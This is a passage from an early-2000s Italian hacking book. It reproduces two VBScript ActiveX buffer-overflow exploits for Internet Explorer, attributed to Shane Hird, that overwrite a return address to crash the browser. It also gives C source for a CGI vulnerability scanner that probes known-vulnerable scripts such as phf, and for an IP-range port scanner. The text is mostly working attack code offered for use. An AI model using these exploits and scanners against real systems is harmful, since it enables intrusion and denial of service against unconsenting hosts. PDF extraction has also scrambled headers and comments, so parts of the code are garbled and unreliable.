Shane Hird")

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA"
'Where the RET address appears to be, RET to ExitProcess (BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'Extra padding to trigger the overrun
expstr = expstr +
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
'Call exploitable method, note the valid help file
hhopen.OpenHelp "Winhlp32.hlp", expstr
--></script>

SETUPBBS

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book

Again, shuts down the browser:


<object
classid="clsid:8F0F5093-0A70-11D0-BCA9-00C04FD85AA6"
id="setupbbs"></OBJECT>
<script language="vbscript"><!-msgbox("MSN Setup BBS Buffer Overrun" + Chr(10) + "Written by Shane Hird")
expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA"
'RET address (ExitProcess BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'This buffer overrun can be triggered by either method.
'setupbbs.vAddNewsServer expstr, true
setupbbs.bIsNewsServerConfigured expstr
--></script>

Test per CGI


Ecco un sorgente che seve a testare le vulnerabilit relative a CGI
/* Tested on Slackware linux with kernel 2.0.35 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

<fcntl.h>
<sys/types.h>
<sys/socket.h>
<netinet/in.h>
<signal.h>
<stdio.h>
<string.h>
<netdb.h>
<ctype.h>
<arpa/nameser.h>
<sys/stat.h>
<strings.h>
<stdio.h>
<stdlib.h>
<unistd.h>
<sys/socket.h>

void main(int argc, char *argv[])


{
int sock,debugm=0;

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg[] = "200";
char *cgistr;
char buffer[1024];
int count=0;
int numin;
char cgibuff[1024];
char *buff[50];
/* Don't u think 50 is enought? */
char *cginame[50]; /* Don't u think 50 is enought? */
buff[1] = "GET /cgi-bin/phf HTTP/1.0\n\n";
buff[2] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
buff[3] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
buff[4] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
buff[5] = "GET /cgi-bin/handler HTTP/1.0\n\n";
buff[6] = "GET /cgi-bin/webgais HTTP/1.0\n\n";
buff[7] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";
buff[8] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n";
buff[9] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n";
buff[10] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n";
buff[11] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n";
buff[12] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n";
buff[13] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n";
cginame[1] = "phf";
cginame[2] = "Count.cgi";
cginame[3] = "test-cgi";
cginame[4] = "php.cgi";
cginame[5] = "handler";
cginame[6] = "webgais";
cginame[7] = "websendmail";
cginame[8] = "webdist.cgi";
cginame[9] = "faxsurvey";
cginame[10] = "htmlscript";
cginame[11] = "pfdisplay";
cginame[12] = "perl.exe";
cginame[13] = "wwwboard.pl";
if (argc<2)
{
printf("\nusage : %s host ",argv[0]);
printf("\n
Or : %s host -d
for debug mode\n\n",argv[0]);
exit(0);
}
if (argc>2)
{
if(strstr("-d",argv[2]))
{
debugm=1;
}
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


exit(0);
}
printf("\n\n\t\t [CKS & Fdisk]'s CGI Checker\n\n\n");
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("\n\n\t [ Press any key to check out the httpd
version...... ]\n");
getchar();
send(sock, "HEAD / HTTP/1.0\n\n",17,0);
recv(sock, buffer, sizeof(buffer),0);
printf("%s",buffer);
close(sock);
printf("\n\t [ Press any key to search 4 CGI stuff...... ]\n");
getchar();
while(count++ < 13)
/* Change 13 to how many buff[?] u have above
*/
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("Searching for %s : ",cginame[count]);
for(numin=0;numin < 1024;numin++)
{
cgibuff[numin] = '\0';
}
send(sock, buff[count],strlen(buff[count]),0);
recv(sock, cgibuff, sizeof(cgibuff),0);
cgistr = strstr(cgibuff,foundmsg);
if( cgistr != NULL)
printf("Found !! ;)\n");
else
printf("Not Found\n");
if(debugm==1)
{
printf("\n\n ------------------------\n %s \n
------------------------\n",cgibuff);
printf("Press any key to continue....\n");
getchar();
}
close(sock);
}

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


}

Uno scanner di DOMINIO


Ecco un semplice scanner di dominio in grado di eseguire lo scan su un range di IP.
/**********************************
* Domain Scanner v2.0
*
* by HoGs HeaD
*
* Fixed up the screwy stuff.
*
* (C)1998 HoGs HeaD
*
* You may not modify and
*
* then redistribute
*
* this source.
*
*********************************/
#include
#include
#include
#include
#include
#include
#include
#include

<stdio.h>
<sys/socket.h>
<sys/types.h>
<sys/wait.h>
<netinet/in.h>
<errno.h>
<netdb.h>
<signal.h>

void brk(int no){


printf("^C Interrupt!\n");
exit(1);
}
void main(int argc, char **argv)
{
struct hostent *host;
/* init stuff */
struct sockaddr_in sa;
int net, error;
int port=23, i, done=0;
char *curr_ip, *del, *cm[100];
int A1, A2, A3, A4;
int B1, B2, B3, B4;
int C1, C2, C3, C4;
printf("\nDomain Scanner v2.0 by HoGs HeaD\nHit any key to
end.\n");
if(argc < 3){
printf("Usage: domscan ip_begin ip_end port\nwhere ip_start
equals the
beginning IP(ie 127.26.26.1)\nand ip_end equals the ending IP(ie
147.26.27.12)\
nand port is the port to check on\n\n");
exit(0);
}
signal(SIGINT, brk);
if(argv[3]==NULL){
}else{
port=atoi(argv[3]);
}
/* Parse in the first Ip.... */
curr_ip=argv[1];

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


del=(char *)strtok(curr_ip, ".");
A1=atoi(del);
del=(char *)strtok(NULL, ".");
A2=atoi(del);
del=(char *)strtok(NULL, ".");
A3=atoi(del);
del=(char *)strtok(NULL, ".");
A4=atoi(del);
/* Read in Second Ip... */
curr_ip = argv[2];
del=(char *)strtok(curr_ip, ".");
B1=atoi(del);
del=(char *)strtok(NULL, ".");
B2=atoi(del);
del=(char *)strtok(NULL, ".");
B3=atoi(del);
del=(char *)strtok(NULL, ".");
B4=atoi(del);
/* We're finished parsing, now onto the actual scan... */
C1=A1;
C2=A2; /* SaVe DeM VaLueS! */
C3=A3;
C4=A4;
for(A4=C4;A4<=B4; A4++){
for(A3=C3;A3<=B3; A3++){
for(A2=C2;A2<=C2; A2++){
for(A1=C1;A1<=B1; A1++){
sprintf(curr_ip, "%d.%d.%d.%d", A1, A2, A3, A4);
build the
ip */
if( ( fork() ) == 0){
fork a chi
ld */
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr(curr_ip);
sa.sin_port = htons(port);
socket is
set and... */
net = socket(AF_INET, SOCK_STREAM, 0);
create socket */
if(net < 2){
exit(2);
}
alarm(5);
wait 5 sec
onds until we cancel connection */
error = connect(net, (struct sockaddr *)&sa, sizeof sa);
attempt co
nnection */

/*
/*

/*
/*

/*

error < 0 ? printf("Error connecting to: %s %s\n", curr_ip,


strerror(errno)) : printf("Connection success at: %s\n", curr_ip);
shutdown(net,
2);
/* disconne
ct socket */
exit(0);
* exit chi
ld process */
}

/*

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


}
}
}
}
gets((char *)i);
}

/* Wait for enter to be pressed to exit */

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it